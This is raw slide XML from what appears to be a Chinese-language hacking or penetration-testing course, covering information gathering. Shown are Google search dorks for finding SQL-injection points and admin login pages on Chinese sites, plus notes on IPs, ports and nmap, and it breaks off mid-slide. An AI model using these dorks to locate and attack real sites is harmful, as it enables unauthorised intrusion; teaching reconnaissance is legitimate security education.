          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3797430" y="1708616"/>
            <a:ext cx="6108700" cy="3944620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C73C7E-7CC9-4E0A-8AFF-48E684AE6BFD}"/>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搜索后台登陆页面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33588861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463690" y="2228671"/>
            <a:ext cx="6215976" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>搜索内容：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inurl:asp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inurl:php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C73C7E-7CC9-4E0A-8AFF-48E684AE6BFD}"/>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注入点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23CF21B0-7DC3-420D-9D7D-9BBFCB875686}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3732115" y="1544358"/>
            <a:ext cx="6108700" cy="3582670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20223664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463690" y="2228671"/>
            <a:ext cx="6215976" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site:cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inurl:login.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C73C7E-7CC9-4E0A-8AFF-48E684AE6BFD}"/>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找中国站点的后台登录页</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A57B45-C2C5-4FA0-8286-B4D7DF1D7773}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4115759" y="1907507"/>
            <a:ext cx="6108700" cy="2954020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3214979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2050"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3311691" y="1124744"/>
            <a:ext cx="0" cy="4165600"/>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2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3791745" y="972516"/>
            <a:ext cx="7200800" cy="5441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marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPts val="5333"/>
              </a:lnSpc>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>介绍</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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信息收集</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后门</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内网渗透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社会工程学</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检测</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endParaRPr lang="zh-CN" altLang="en-US" sz="2667" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="791411" y="1858923"/>
            <a:ext cx="2208245" cy="2409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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5333" spc="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>教学大纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5333" spc="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21757835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463690" y="2228671"/>
            <a:ext cx="4938734" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>搜索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intitle:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>管理登录 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filetype:php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>意思为查询网页标题含有“管理登录”，并且为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>类型的网站。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C73C7E-7CC9-4E0A-8AFF-48E684AE6BFD}"/>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敏感信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17805719-DED7-4709-B4DD-75FA1E98945F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5183899" y="701675"/>
            <a:ext cx="6108700" cy="5454650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15634771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端口扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B11342E0-F122-4220-BD1D-7A42AA9BA1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948880" y="2008805"/>
            <a:ext cx="10434465" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址是指互联网协议地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Internet Protocol Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，又译为网际协议地址，是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的缩写。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议提供的一种统一的地址格式，它为互联网上的每一个网络和每一台主机分配一个逻辑地址，以此来屏蔽物理地址的差异。目前还有些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代理软件，但大部分都收费。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在网络技术中，端口（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）大致有两种意思：一是物理意义上的端口，比如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ADSL Modem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、集线器、交换机、路由器用于连接其他网络设备的接口，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>RJ-45</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口等等。二是逻辑意义上的端口，一般是指</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议中的端口，比如用于浏览网页服务的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口，用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口等等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29680573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端口扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B11342E0-F122-4220-BD1D-7A42AA9BA1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948880" y="2008805"/>
            <a:ext cx="10434465" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是一个网络探测和安全扫描程序，系统管理者和个人可以使用这个软件扫描大型的网络，获取那台主机正在运行以及提供什么服务等信息。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>支持很多扫描技术，例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>TCP connect()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>TCP SYN(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>半开扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(bounce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、反向标志、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>扫描、圣诞树</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(Xmas Tree)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>扫描和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>扫描。从扫描类型一节可以得到细节。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>还提供了一些高级的特征，例如：通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议栈特征探测操作系统类型，秘密扫描，动态延时和重传计算，并行扫描，通过并行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>扫描探测关闭的主机，诱饵扫描，避开端口过滤检测，直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>RPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>无须端口影射</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，碎片扫描，以及灵活的目标和端口设定。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15284091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948880" y="2008805"/>
            <a:ext cx="10434465" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查看一个主机是否在线。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
